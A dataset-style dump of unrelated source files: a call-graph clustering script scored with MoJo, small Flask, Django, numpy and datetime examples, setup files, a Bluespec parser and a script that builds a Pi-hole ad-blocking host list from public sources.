# print("exportingToMoJoFormatAlgorithm(k, n, clustersFinal, fileNames, filePathNames, run_no, folderPathResult)")
f1 = open (folderPathResult + "/MoJoAlgorithm" + str(k) + "_" + str(run_no) + ".txt" , "w")
for centerIndex in range(k):
for i in range(len(clustersFinal[centerIndex])):
f1.write("contain ")
f1.write("hulu")
f1.write(str(centerIndex))
f1.write(" ")
f1.write(fileNames[clustersFinal[centerIndex][i]])
f1.write("\n")
f1.close()
# Start
cvsFilePathString = []
pathResultString = []
# print("for root, dirs, files in os.walk(\"CaseStudies\")")
for root, dirs, files in os.walk("CaseStudies"):
for file in files:
if file.endswith(('.csv')):
cvsFilePath=os.path.join(root, file)
cvsFilePathString.append(cvsFilePath)
resultPath = os.path.join(root,"../result",file)
pathResultString.append(resultPath)
if not os.path.isdir(resultPath):
os.makedirs(resultPath)
# print("for i in range (len(pathResultString))")
for i in range (len(pathResultString)):
if not os.path.isdir(pathResultString[i]):
os.mkdir(pathResultString[i])
# print("for cvsFileNumber in range (0,len(cvsFilePathString))")
for cvsFileNumber in range (0,len(cvsFilePathString)):
dcSim=list()
cvsFp=cvsFilePathString[cvsFileNumber]
df = pd.read_csv(cvsFp)
df.fillna(0, inplace = True)
sourceCodeFp="SourceCodes/{}.src/".format(ntpath.basename(cvsFp)[0:-4])
filePaths= [sourceCodeFp+n for n in list(df.columns.values[1:])]
newGmadc = gmadc(filePaths)
fileDirs=["'{}'".format(os.path.dirname(path)).replace(" ","%20") for path in filePaths]
fileNames=list(["'{}'".format(ntpath.basename(path)) for path in filePaths])
fileExts=list([os.path.splitext(name)[1] for name in fileNames])
df.drop(df.columns[0], axis=1, inplace=True)
cdgNonSquer=df.to_numpy()
cdgNonSquerMaxLen=max(len(cdgNonSquer[0,:]),len(cdgNonSquer[:,0]))
# print(cdgNonSquerMaxLen,len(cdgNonSquer[0,:]),len(cdgNonSquer[:,0]))
cdgNonSymetric=np.resize(cdgNonSquer,(cdgNonSquerMaxLen,cdgNonSquerMaxLen))
SymetricCDG = np.maximum( cdgNonSymetric, cdgNonSymetric.transpose() )
# print("SymetricCDG\n",SymetricCDG)
timeInit = 0
timeClustering = 0
timeTotal = 0
filePathNames = [[fileDirs[i],fileNames[i],fileNames[i]] for i in range(len(fileNames))]
# print(np.corrcoef(callMatrix))
# print(filePathNames)
print(cvsFilePathString[cvsFileNumber]+":\tinput files completed :)")
exportingToMoJoFormatExpert(fileNames, filePathNames, pathResultString[cvsFileNumber])
print(cvsFilePathString[cvsFileNumber]+":\texporting to MoJo format for expert completed :)")
time1 = time.time()
time2 = time.time()
timeInit = time2 - time1
print(cvsFilePathString[cvsFileNumber]+":\tgenerating call matrix to symmetric completed :)")
csrCDG = csr_matrix(SymetricCDG)
# print("csrCDG\n", csrCDG)
#############
##########
##########
############
####### ##
## ####### ##
###### ####### #####
########### ####### #######
######## ####### ####### ########
####### ########## ## ########
##### ### ##### ##### ########
###### ### # ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
# to draw the plot
cg = CallGraph(csrCDG )
cg.draw()
dist_matrix = shortest_path(csgraph=csrCDG,method='FW')# FW: floydwarshal
dist_matrix[dist_matrix == inf] = 0
# print(dist_matrix)
# Similarity Matrix Calculation
similarityMatrix = cosine_similarity(dist_matrix)
# print("for i in range(len(similarityMatrix))")
for i in range(len(similarityMatrix)):
similarityMatrix[i][i]=1
# np.savetxt('cosine_similarity.csv', similarityMatrix, delimiter=',', fmt='%s')
# print("simMtx\n",similarityMatrix)
# similarityMatrix = createSimilarityMatrix(dist_matrix)
time1 = time.time()
time2 = time.time()
timeInit = timeInit + time2 - time1
print(cvsFilePathString[cvsFileNumber]+":\tcalculating shortest path matrix completed :)")
time1 = time.time()
# similarityMatrix = createSimilarityMatrix(dist_matrix)
# np.savetxt('createSimilarityMatrix.csv', similarityMatrix, delimiter=',', fmt='%s')
# print(np.array(similarityMatrix))
time2 = time.time()
timeInit = timeInit + time2 - time1
print(cvsFilePathString[cvsFileNumber]+":\tforming similarity completed :)")
# print(similarityMatrix)
n = len(SymetricCDG) # number of elements
result = []
maxRunNo = 1 # default: maxRunNo = 30
maxK = 3 # default:
maxK = int(min(int(n/3), 100))
# bar = Bar('Processing', max=maxK*maxRunNo)
# Mohem
# print("for run_no in range (1,maxRunNo+1)")
for run_no in range (1,maxRunNo+1):
# print("for k in range (2,maxK + 1)")
for k in range (2,maxK + 1):
print("Progress: {}/{},{}/{},{}/{} ".format(cvsFileNumber,len(cvsFilePathString),run_no,(maxRunNo),k,(maxK)))
# bar.next()
time1 = time.time()
clustersInit = initializing(k , n, similarityMatrix)
# print("After initializing:\nclusters: ",clustersInit)
# print("initializing culsters completed :)")
# similarityFunction = computeSimilarityFunction(clustersInit, similarityMatrix)
# print("similarityFunction:",similarityFunction,"\n")
clustersUpdateCenter = correctCenter(clustersInit, similarityMatrix)
# print("clustersUpdateCenter: ",clustersUpdateCenter)
# similarityFunctionUpdate = computeSimilarityFunction(clustersUpdateCenter, similarityMatrix)
# print("similarityFunctionUpdate: ",similarityFunctionUpdate)
clustersFinal = clustering(k, n, similarityMatrix, clustersUpdateCenter)
#####################################, ############
##################################### &########
##################################### .#####
#, ###########( ##
#, ###### #
#############( .## ,###### %####
### ###### ##. ,& *######## ########
# *########## &## # ########## %###########
# ############ ###( %#########################
# *###& .#### &## # ##########&%############
### ###### ##, # ######### #########
############## .## ####### &#####
#, ###### *##
#, ########### #
##################################### ####
##################################### &#######
##################################### .###########
# print("1.clustersFinal\n",len(clustersFinal),clustersFinal)
if len(dcSim)==0:
for dc in range(len(dccil)):
sim = 0
for cl in range(n):
if newGmadc.getSim(dc,cl)>sim: # and dccil[dc]!=cl:
sim = newGmadc.getSim(dccil[dc],cl)
if len(dcSim)>dc:
dcSim[dc]=cl
else:
dcSim.append(cl)
# print(dcSim)
# print(clustersFinal)
for dc in range(min(len(dcSim), len(dccil))):
DCposition = index_2d(clustersFinal, dccil[dc])
# print("dc: ",dc,"\nlen(dccil): ",len(dccil),"\nlen(dcSim): ",len(dcSim))
DSposition = index_2d(clustersFinal, dcSim[dc])
clustersFinal[DSposition[0]].append(clustersFinal[DCposition[0]].pop(DCposition[1]))
print(" {}({})\t-->\t{}({})\t(Disconnected class: {},\tmoved to cluster of it's must similar class: {})" \
.format(DCposition[0],dccil[dc],
DSposition[0],dcSim[dc],
fileNames[dccil[dc]],
fileNames[dcSim[dc]]
))
dccil=list()
###################################################
time2 = time.time()
timeClustering = time2 - time1
timeTotal = timeInit + timeClustering
# i disabled it
# print(cvsFilePathString[cvsFileNumber]+ ":\tclustering completed at k = " + str(k)+ " and in run = " + str(run_no) + " :)")
# exportingToMoJoFormatAlgorithmManual(k, n, clustersFinal)
# print("exporting to MoJo format algorithm manually completed :)")
exportingToMoJoFormatAlgorithm(k, n, clustersFinal, fileNames, filePathNames, run_no, pathResultString[cvsFileNumber])
# print("exporting to MoJo format algorithm completed :)")
MoJoAlgorithmPath ="{}/MoJoAlgorithm{}_{}.txt".format(pathResultString[cvsFileNumber],k,run_no)
MoJoExpertPath= "{}/MoJoExpert.txt".format(pathResultString[cvsFileNumber])
# print(run_no,k,cvsFileNumber,MoJoAlgorithmPath,MoJoExpertPath)
proc = subprocess.Popen(["java", "mojo/MoJo", MoJoAlgorithmPath , MoJoExpertPath], stdout=subprocess.PIPE)
outs, errs = proc.communicate()
mojoMeasure = int(outs[:-1])
proc = subprocess.Popen(["java", "mojo/MoJo", MoJoAlgorithmPath , MoJoExpertPath,"-fm"], stdout=subprocess.PIPE)
outs, errs = proc.communicate()
mojoFmMeasure = float(outs[:-1])
# print(mojoFmMeasure)
result.append([run_no,k,mojoMeasure,mojoFmMeasure,timeInit,timeClustering,timeTotal])
# print(result)
# bar.finish()
outputFileResult = open (pathResultString[cvsFileNumber] + "/result.txt", "w")
outputFileResult.write("RunNO\tK\tMoJo\tMoJo fm\tTime Init\tTime Clustering\tTime Total\n")
# print("outputFileResult")
mj,mjfm=list(),list()
for i in range (0, maxRunNo * (maxK-1)):
outputFileResult.write(
"{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(
result[i][0],
result[i][1],
result[i][2],
result[i][3],
result[i][4],
result[i][5],
result[i][6]
))
mjfm.append(result[i][3])
mj.append(result[i][2])
outputFileResult.close()
print("min(mj): ",min(mj))
print("max(mjfm): ",max(mjfm))
outputFileResult.close()
del fileNames
del filePathNames
del cdgNonSymetric
del SymetricCDG
del similarityMatrix
del dist_matrix
del clustersFinal
del clustersInit
del clustersUpdateCenter
| [
"mablue92@gmail.com"
] | mablue92@gmail.com |
bf7948052fb1e2aecca90f904a6ed0cba3fbc785 | eebe77c4ff02edb670f7877460278002d81b4b2a | /api/app.py | df74bb00d3423fa0e568102378608c2ac0da497e | [
"MIT"
] | permissive | dinabandhub-Aira/FREQUENT_OPIATE_PRESCRIBER | 09fe2130c68a532190e2c67a55d5e9ccabe9ba24 | 3a434be2b15a987301bf165a6978c6fe24ad43d5 | refs/heads/master | 2023-08-10T23:12:28.815501 | 2021-10-02T05:46:03 | 2021-10-02T05:46:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | from flask import Flask, render_template, request, jsonify
from package_fop.predict import make_prediction
from package_fop import config
import pandas as pd
import joblib
import sys
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def front_end():
return render_template('home.html')
@app.route('/pred', methods=['GET', 'POST'])
def test():
j_data = request.get_json()
df = pd.read_json(j_data)
# data management
X_test, y_test = df.drop(config.TARGET,axis=1), df[config.TARGET]
# pred
y_pred = make_prediction(X_test)
# printing to console in the server console
# print(y_pred, file=sys.stdout)
return {'Actual':str(y_test.values.reshape(-1,)),'Pred':str(y_pred)}
if __name__ == '__main__':
app.run(debug=True)
| [
"beheradinabandhu50@gmail.com"
] | beheradinabandhu50@gmail.com |
59dac134825f1c2f542c184ecdfcc74551ff5f29 | 69af4476736dfc16dd8214c1fef49377c60ba73b | /motorcontroller/apps.py | abaaaefb1c38e8b3d7420eacfc952570a5361506 | [] | no_license | abdulhalim-cu/learn_django_by_example | 08304f0babb80428ef3cc0dc497ddf3c3b59921c | dacc2d3fd129b1b88ae685a6f1b46dfc6e5c8735 | refs/heads/master | 2021-01-16T18:07:09.642689 | 2017-08-26T08:56:21 | 2017-08-26T08:56:21 | 100,036,868 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from django.apps import AppConfig
class MotorcontrollerConfig(AppConfig):
name = 'motorcontroller'
| [
"abdulhalim.cu10@gmail.com"
] | abdulhalim.cu10@gmail.com |
9a116f813c39f9c6e3b1f119c34e0d3b08336041 | 5c74051ddb66b7bebd5807c978575977bff84cd3 | /numpy/numpy_3.py | 5980223d231071a1bcacc908dc119cd06640f191 | [] | no_license | cuppar/numpy_test | 762e846c23199aa6b492ff5785385fe6755384bd | 17480f5a27479b85dbdcd67fad0073b2ae24ad56 | refs/heads/master | 2021-08-07T04:20:02.446972 | 2017-11-07T14:04:42 | 2017-11-07T14:04:42 | 109,843,302 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | #可看做扩展Python的list
import numpy as np
#画图工具
import matplotlib.pyplot as plt
#随机生成一个30*30的[0,1)的随机数表
image = np.random.rand(30, 30)
#把该数表显示为一个热量图
plt.imshow(image, cmap=plt.cm.rainbow)
#显示热力指示条
plt.colorbar()
#显示画布
plt.show()
| [
"cuppar.hzy@gmail.com"
] | cuppar.hzy@gmail.com |
b64b28957428cae3691439bd6521fdf697ec02a9 | b10808f1407517fac1acd224bd3909f7110134ed | /deployment/cv/urls.py | b64c54686d00e6366449c770f4b279bf931f095a | [] | no_license | Mohit0928/Computer-Vision | af468054c4890e997f442b15c1e931da96b00cf2 | ea8e2b435df7a0f9b4a60c6dfb9ed35378c3bea1 | refs/heads/master | 2023-07-11T16:21:18.026405 | 2021-08-06T03:40:29 | 2021-08-06T03:40:29 | 393,006,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,172 | py | """deployment URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.base, name='base'),
path('classification', views.classification, name='classification'),
path('semantic_segmentation', views.semantic_segmentation, name='semantic_segmentation'),
path('panoptic_segmentation', views.panoptic_segmentation, name='panoptic_segmentation'),
path('object_detection', views.object_detection, name='object_detection'),
path('license_plate',views.license_plate,name='license_plate'),
] | [
"mohityadav0928@gmail.com"
] | mohityadav0928@gmail.com |
66d3b0de7469b1683d10d96d96d69ab4acea07d3 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Hackerrank/Hackkerrank-Designer PDF Viewer.py | 1c85d2e8aa255eccd12daed1cbc4d104ce1bd3ca | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the designerPdfViewer function below.
def designerPdfViewer(h, word):
# word = nhan
# arr = [1,3,2,1]
arr=[]
for letter in word:
index = ord(letter) - 97
arr.append(h[index])
return max(arr) * len(arr)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = list(map(int, input().rstrip().split()))
word = input()
result = designerPdfViewer(h, word)
fptr.write(str(result) + '\n')
fptr.close() | [
"ntle1@pipeline.sbcc.edu"
] | ntle1@pipeline.sbcc.edu |
15218a1f163359e8df4dae8392b7dc8ae2df3796 | abbef3bb190ef3c4e93a534e20876fdcf96a74e6 | /src/validacao.py | e84b8c7e9619f09a897efb0a4290eee3eff842d3 | [
"MIT"
] | permissive | J040/look-up-to-the-sky-and-see | 845748a4c9240cc8d95df1cc175acdc2ab2ae59a | 3267585f36ee5e4750505c4c1de110c61a660e1d | refs/heads/master | 2022-09-11T23:01:08.997127 | 2022-09-07T21:13:09 | 2022-09-07T21:13:09 | 204,081,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,413 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 18 10:18:52 2019
@author: João Victor Ribeiro de Jesus
"""
from __future__ import print_function
# GALAXIAS COMO SENDO REFERENTE À CLASSIFICACAO '0'
def compararClassificacao1(objetos):
acertos = 0
erros = 0
VP = 0
VN = 0
FP = 0
FN = 0
estrelasExistentes = 0
galaxiasExistentes = 0
totalVarianciaGalaxias = 0
totalVarianciaEstrelas = 0
for objeto in objetos:
if 1 == objeto["classificacaoGerada"]:
galaxiasExistentes += 1
totalVarianciaGalaxias += objeto["variancia"]
if 0 == objeto["classificacaoGerada"]:
estrelasExistentes += 1
totalVarianciaEstrelas += objeto["variancia"]
if 'GALAXY' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
acertos += 1
VP += 1
elif 'STAR' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
elif 'GALAXY' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
erros += 1
FN += 1
elif 'STAR' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
acertos += 1
VN += 1
elif 'DESCONHECIDO' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
mediaG = totalVarianciaGalaxias / galaxiasExistentes
#print('Galaxias acertadas:', acertosGalaxias, 'Galaxias erradas:', errosGalaxias, 'Estrelas acertadas:', acertosEstrelas, 'Estrelas erradas:', errosEstrelas)
return acertos, erros, estrelasExistentes, galaxiasExistentes, mediaG, VP, VN, FP, FN
# GALAXIAS COMO SENDO REFERENTE À CLASSIFICACAO '0'
def compararClassificacao0(objetos):
acertos = 0
erros = 0
VP = 0
VN = 0
FP = 0
FN = 0
estrelasExistentes = 0
galaxiasExistentes = 0
totalVarianciaGalaxias = 0
totalVarianciaEstrelas = 0
for objeto in objetos:
if 0 == objeto["classificacaoGerada"]:
galaxiasExistentes += 1
totalVarianciaGalaxias += objeto["variancia"]
if 1 == objeto["classificacaoGerada"]:
estrelasExistentes += 1
totalVarianciaEstrelas += objeto["variancia"]
if 'GALAXY' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
acertos += 1
VP += 1
elif 'STAR' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
elif 'GALAXY' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
erros += 1
FN += 1
elif 'STAR' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
acertos += 1
VN += 1
elif 'DESCONHECIDO' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
mediaG = totalVarianciaGalaxias / galaxiasExistentes
#print('Galaxias acertadas:', acertosGalaxias, 'Galaxias erradas:', errosGalaxias, 'Estrelas acertadas:', acertosEstrelas, 'Estrelas erradas:', errosEstrelas)
return acertos, erros, estrelasExistentes, galaxiasExistentes, mediaG, VP, VN, FP, FN | [
"umvelhobarbudo@gmail.com"
] | umvelhobarbudo@gmail.com |
07c43020b2c4de524585a2995ba0ad589f42ef70 | 8fd92c0a65c9b3e3912b6e8ef043656ee225880a | /datetime_examples.py | e6023b44234c3f6cfb1b822db2448812f1685d86 | [] | no_license | waiteb15/py3forsci3day | 9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4 | fc664042618f0910d40e85677a2438eef5cce2b7 | refs/heads/master | 2020-04-25T11:24:18.697218 | 2019-02-28T23:40:52 | 2019-02-28T23:40:52 | 172,743,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
from datetime import date, datetime, timedelta, time
today = date.today()
print(today, today.year)
james_bd = date(2014, 8, 1)
print(james_bd)
delta = today - james_bd
print(delta)
years = int(delta.days // 365.25)
print(f"James is {years} years old")
event = datetime(2019, 5, 11, 13, 22, 47)
print(event)
ten_years = timedelta(10 * 365.25)
print(james_bd + ten_years)
import time
start = time.time()
# do something
end = time.time()
seconds = end - start
print("Wait for it....", end="", flush=True)
time.sleep(0)
print("done")
from dateutil.parser import parse
import dateutil.utils
my_dates = [
"Apr 1, 2019",
"2019-04-01",
"4/1/19",
"4-1-2019",
"April 1 2019",
"Feb 31, 2032",
]
for d in my_dates:
try:
print(parse(d))
except Exception as err:
print(err)
d = dateutil.utils.datetime(2019, 4, 1, 11, 11, 11, 0)
print(d, type(d))
| [
"waiteb15@gmail.com"
] | waiteb15@gmail.com |
441c5e0fd346e1a186534989313ef8fd0f7c6452 | 85aecf00924db457d3874b314ab8b2962a75e788 | /depth_analyze.py | ef0368d352b20283331e797b110ca6886d1edd6a | [] | no_license | JakubKedzierski/detection_test_app | 57a15b58e090a821d9bc540fa5b4979397a62ced | 640823edf2397c9c0897ebfbfd54ad5936296478 | refs/heads/main | 2023-09-06T01:55:54.556167 | 2021-11-06T19:36:33 | 2021-11-06T19:36:33 | 425,331,145 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | from enum import Enum, auto
import numpy as np
class DepthAnalyze:
median = auto()
mean = auto()
def analyzeDepth(image_depth, output, analyze_pipeline=DepthAnalyze.median):
image_depth_orginal = image_depth.as_depth_frame()
bbox_to_remove = []
for bbox in output.bboxes:
point_LD = (bbox[1], bbox[0]) # left down
point_RU = (bbox[3], bbox[2]) # right upper
distance = 0
clipped_size = 20
width = bbox[3] - bbox[1] - clipped_size
height = bbox[2] - bbox[0] - clipped_size
if width <= 0:
width = 1
if height <= 0:
height = 1
depth_array = []
it_x = -1
it_y = -1
for i in range(int(bbox[1]) + int(clipped_size / 2), int(bbox[3]) - int(clipped_size / 2)):
it_x = it_x + 1
it_y = -1
for j in range(int(bbox[0]) + int(clipped_size / 2), int(bbox[2]) - int(clipped_size / 2)):
it_y = it_y + 1
depth = image_depth_orginal.get_distance(i, j)
if depth != 0:
depth_array.append(depth)
distance = distance + depth
area = (bbox[3] - bbox[1]) * (bbox[2] - bbox[0])
mean_distance = distance / area
median_distance = np.median(np.array(depth_array))
distance = 0
if analyze_pipeline is DepthAnalyze.mean:
distance = mean_distance
else:
distance = median_distance
max_distance = 0.55
if distance > max_distance:
bbox_to_remove.append(bbox)
for box in bbox_to_remove:
result = np.where((output.bboxes == box).all(axis=1))
output.bboxes = np.delete(output.bboxes, result, 0)
output.class_ids = np.delete(output.class_ids, result)
if len(output.masks) > 0:
output.masks = np.delete(output.masks, result, 2)
if len(output.scores) > 0:
output.scores = np.delete(output.scores, result)
return output
| [
"248915@student.pwr.edu.pl"
] | 248915@student.pwr.edu.pl |
f3bce732943723b4735221094555753d6f4c37c7 | d2f7b20c023018e7f0a47558c39f3dd25099cad9 | /ui_service/setup.py | 279e826062efe2b304acf3f3b66acd0b1b5b6d54 | [] | no_license | bhavenp/docker_sentiment_analysis | 7401f36c708966420465f9a898a1f1b80160702e | 28cee06e1352866fa72b8bdbbd09a42f3a010add | refs/heads/master | 2022-12-04T06:30:48.661067 | 2020-08-19T15:28:08 | 2020-08-19T15:28:08 | 285,861,054 | 0 | 1 | null | 2020-08-17T21:59:26 | 2020-08-07T15:22:30 | CSS | UTF-8 | Python | false | false | 754 | py | from pathlib import Path
from setuptools import setup, find_packages
ROOT_DIR = Path(__file__).resolve().parent
with open(ROOT_DIR / "README.md", "r") as f:
long_description = f.read().strip()
setup(
name="sentiment_analysis_ui_service",
version=0.1,
description="Display the UI using a Flask application. UI will interact with the ML model.",
long_description=long_description,
author="Bhaven Patel",
python_requires= ">=3.6.0",
packages=find_packages(),
include_package_data=True,
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6"
],
) | [
"3346052+bhavenp@users.noreply.github.com"
] | 3346052+bhavenp@users.noreply.github.com |
f8aaf5b7ebcb85dc4d6f259686f7bfc3cb2be03b | 8791c290c3c6e6ad22bf3635b3b512badda40354 | /main.py | feb33b0ee7aca1845c769a70d65614b5447ef09e | [] | no_license | wndenis/gSorter | 99dfde299b9722958dd9a58867c1f468c0e6b1c1 | 18c526825724002eff2c7951b261e6730909332d | refs/heads/master | 2020-05-01T01:50:02.813579 | 2020-04-19T01:10:23 | 2020-04-19T01:10:23 | 177,203,979 | 1 | 0 | null | 2019-05-02T08:03:39 | 2019-03-22T20:18:14 | null | UTF-8 | Python | false | false | 2,791 | py | # -*- coding: utf-8 -*-
from pykinect2 import PyKinectV2
from pykinect2 import PyKinectRuntime
import numpy as np
import cv2
from imageai.Detection import ObjectDetection
import os
if __name__ == "__main__":
print("Start.")
execution_path = os.getcwd()
detector = ObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setModelPath(os.path.join(execution_path, "yolo.h5"))
# detector.setModelTypeAsTinyYOLOv3()
# detector.setModelPath(os.path.join(execution_path, "yolo-tiny.h5"))
detector.loadModel()
custom_objects = detector.CustomObjects(person=True, umbrella=True, car=True, cup=True, fork=True, knife=True, bottle=True, cell_phone=True)
kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color)
shape = (424, 512)
midpoint = (kinect.color_frame_desc.Width // 2, kinect.color_frame_desc.Height // 2)
cv2.namedWindow("output", cv2.WINDOW_NORMAL)
while True:
frame = kinect.get_last_color_frame()
frame = frame.reshape((1080, 1920, -1)).astype(np.uint8)
# frame = np.reshape(frame, (1080, 1920, -1))#.astype(np.uint8)
frame = cv2.resize(frame, (0, 0), fx=0.3, fy=0.3, interpolation=cv2.INTER_CUBIC)
# frame = cv2.resize(frame, dsize=(1920//4, 1080//4), interpolation=cv2.INTER_CUBIC)
#gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if True:
detections = detector.detectCustomObjectsFromImage(input_image=frame,
input_type="array",
output_type="array",
minimum_percentage_probability=70,
custom_objects=custom_objects)
for box in detections[1]:
b = box['box_points']
cv2.rectangle(frame, b,
(0, 0, 250), 2)
label = "{} {:.2f}".format(box['name'], box['percentage_probability'])
cv2.putText(frame, label, (b[0], b[1] - 10), cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 255), 2)
# print(box)
# print("\n\n\n\n\n\n\n")
# frame = np.reshape(frame, shape)
# frame = np.uint8(frame.clip(1, 4000) / 16.)?????????????????
# frame = cv2.bilateralFilter(frame, 9, 150, 75)
# cv2.rectangle(frame, (midpoint[0]-15, midpoint[1]-15), (midpoint[0]+15, midpoint[1]+15), (32000, 32000, 32000), 2)
# color = frame[midpoint]
#frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
cv2.imshow("output", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
| [
"winda.wzse@gmail.com"
] | winda.wzse@gmail.com |
1bca0d375f7e15a441d59fa7d53ab93591fafacd | a2676d947a1117f55aa56bf204af91e2fc4e14c1 | /sw/interface/bsvparse.py | dabfd331cb972e02768b1b1b76b43bfda412ea13 | [] | no_license | jwcxz/bt | 1c21a56e0c9ffb8f500122d5f8f860f488f65df7 | 7201f061a3ea2b5d1f8d6f1524c6418feb67ea29 | refs/heads/master | 2016-09-06T02:19:13.690233 | 2013-05-15T20:14:17 | 2013-05-15T20:14:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import re
re_met = re.compile('.*typedef\s+(?P<num>\d+)\s+NumMetronomes;.*');
re_base = re.compile('.*Real\s+min_tempo\s+=\s+(?P<base>\d+)\s*;.*');
def get_num_base(fname):
f = open(fname, 'r');
num = None;
base = None;
for line in f:
if re_met.search(line):
num = int(re_met.search(line).groupdict()['num']);
elif re_base.search(line):
base = int(re_base.search(line).groupdict()['base']);
if num != None and base != None:
break;
f.close();
return (num, base);
| [
"jwc@jwcxz.com"
] | jwc@jwcxz.com |
ec1a3d7966710dda0715824013d254e4aed4ffdc | ec61289c9345fdc4c7f4c79b416961618b70f30c | /scripts/stevenblack.py | a659c53ea2b804f429d2f5406be20d6a97438fa0 | [] | no_license | icedevil2001/pihole_blocklist | fb26a0578bdb3f2e642e2a8f4489de05e2a58dce | 10b900c713a1f8b79d88995e96694dd0f19da929 | refs/heads/master | 2023-06-22T18:49:24.086897 | 2023-06-12T05:05:05 | 2023-06-12T05:05:05 | 269,239,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,395 | py | import requests
import re
## See: https://github.com/StevenBlack/hosts
def process_host_file(text):
for line in text.strip().split('\n'):
if line.startswith('#'):
continue
line = line.strip().replace('0.0.0.0 ','')
if line:
yield line
def process_url(url):
# url = 'https://raw.githubusercontent.com/StevenBlack/hosts/master/data/StevenBlack/hosts'
req = requests.get(url)
if req.status_code == requests.codes.ok:
for line in process_host_file(req.text):
yield line
# content = base64.decodestring(req['content'])
URLS = ['https://raw.githubusercontent.com/StevenBlack/hosts/master/data/StevenBlack/hosts',
"https://raw.githubusercontent.com/AdAway/adaway.github.io/master/hosts.txt",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.2o7Net/hosts",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.Dead/hosts",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.Risk/hosts",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.Spam/hosts",
"https://raw.githubusercontent.com/mitchellkrogza/Badd-Boyz-Hosts/master/hosts",
"https://raw.githubusercontent.com/bigdargon/hostsVN/master/option/hosts-VN",
"https://raw.githubusercontent.com/PolishFiltersTeam/KADhosts/master/KADhosts.txt",
"https://raw.githubusercontent.com/MetaMask/eth-phishing-detect/master/src/hosts.txt",
"https://raw.githubusercontent.com/jamiemansfield/minecraft-hosts/master/lists/tracking.txt",
"https://winhelp2002.mvps.org/hosts.txt",
"https://raw.githubusercontent.com/shreyasminocha/shady-hosts/main/hosts",
"https://someonewhocares.org/hosts/zero/hosts",
"https://raw.githubusercontent.com/tiuxo/hosts/master/ads",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/UncheckyAds/hosts",
"https://urlhaus.abuse.ch/downloads/hostfile/",
"https://pgl.yoyo.org/adservers/serverlist.php?hostformat=hosts&mimetype=plaintext&useip=0.0.0.0"]
filename = "/Users/icedevil2001/Dropbox/Documents/Documents-Priyesh_MacBookPro13/git/pihole_blocklist/blocklist/StevenBlack.txt"
with open(filename, 'w') as fh:
for url in URLS:
for line in process_url(url):
fh.write(line + "\n") | [
"priyesh1983@gmail.com"
] | priyesh1983@gmail.com |
9c37abc4fa6449ae6902e9b29f313a0b8cc9220d | 515d347ea81092512a5f5e945e152c0d27f928a8 | /utilities/teststatus.py | 0cc74efd7f8318891fd6e81272b9e4c0c1e501d2 | [] | no_license | Mrinalini-18/Sparkstone-QA | d19325b477ebd71f7e39411319c5b96b1d251ecf | f9b0179851339cb885425d35ce52b71037a135df | refs/heads/master | 2023-01-09T10:34:20.163099 | 2020-11-09T13:40:07 | 2020-11-09T13:40:07 | 311,349,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | import utilities.custom_logger as cl
import logging
from base.selenium_driver import SeleniumDriver
from traceback import print_stack
class TestStatus(SeleniumDriver):
log = cl.customLogger(logging.INFO)
def __init__(self, driver):
"""
